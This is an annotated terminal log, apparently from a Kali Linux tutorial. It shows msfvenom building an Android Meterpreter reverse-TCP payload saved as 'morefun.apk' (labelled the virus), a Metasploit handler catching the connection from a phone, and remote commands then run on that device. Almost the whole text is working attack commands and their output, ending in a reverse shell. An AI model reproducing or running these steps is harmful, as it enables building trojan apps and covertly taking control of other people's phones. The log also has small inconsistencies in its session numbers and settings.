root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.117 -o /root/morefun.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 9486 bytes

Saved as: /root/morefun.apk            (the virus)

 

root@kali:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.117                            (the Kali Linux host)

msf exploit(handler) > show options

 

Module options (exploit/multi/handler):

 

  Name  Current Setting  Required Description

  ----  ---------------  -------- -----------

 

 

Payload options (android/meterpreter/reverse_tcp):

 

  Name             Current Setting  Required  Description

  ----            ---------------  --------  -----------

  AutoLoadAndroid  true             yes       Automatically load the Android extension

  LHOST                            yes       The listen address

  LPORT            4444             yes       The listen port

 

 

Exploit target:

 

  Id  Name

  --  ----

  0   Wildcard Target

 

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.

 

[*] Started reverse TCP handler on 192.168.1.117:4444

[*] Starting the payload handler...

Listening starts

msf exploit(handler) > [*] Sending stage (63194 bytes) to 192.168.1.224

[*] Meterpreter session 1 opened (192.168.1.117:4444 -> 192.168.1.224:60942) at 2017-03-09 01:11:31 -0500          (session 1 is created after morefun.apk is installed and run on the Android phone)

 

msf exploit(handler) > sessions

 

Active sessions

===============

 

 Id  Type                      Information          Connection

 --  ----                      -----------          ----------

 3   meterpreter java/android  u0_a508 @ localhost  192.168.1.117:4444 -> 192.168.1.224:49711 (192.168.1.224)

 

msf exploit(handler) > sessions -i 3                (3 is the session Id)

[*] Starting interaction with 3...

 

meterpreter > help                 (you can now see, on this Android phone, ......)

meterpreter > ifconfig

Interface 10

============

Name        : wlan0 - wlan0

Hardware MAC : d0:22:be:a4:7e:11

IPv4 Address : 192.168.1.224

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::d222:beff:fea4:7e11

IPv6 Netmask : ::

meterpreter > ps

meterpreter > ls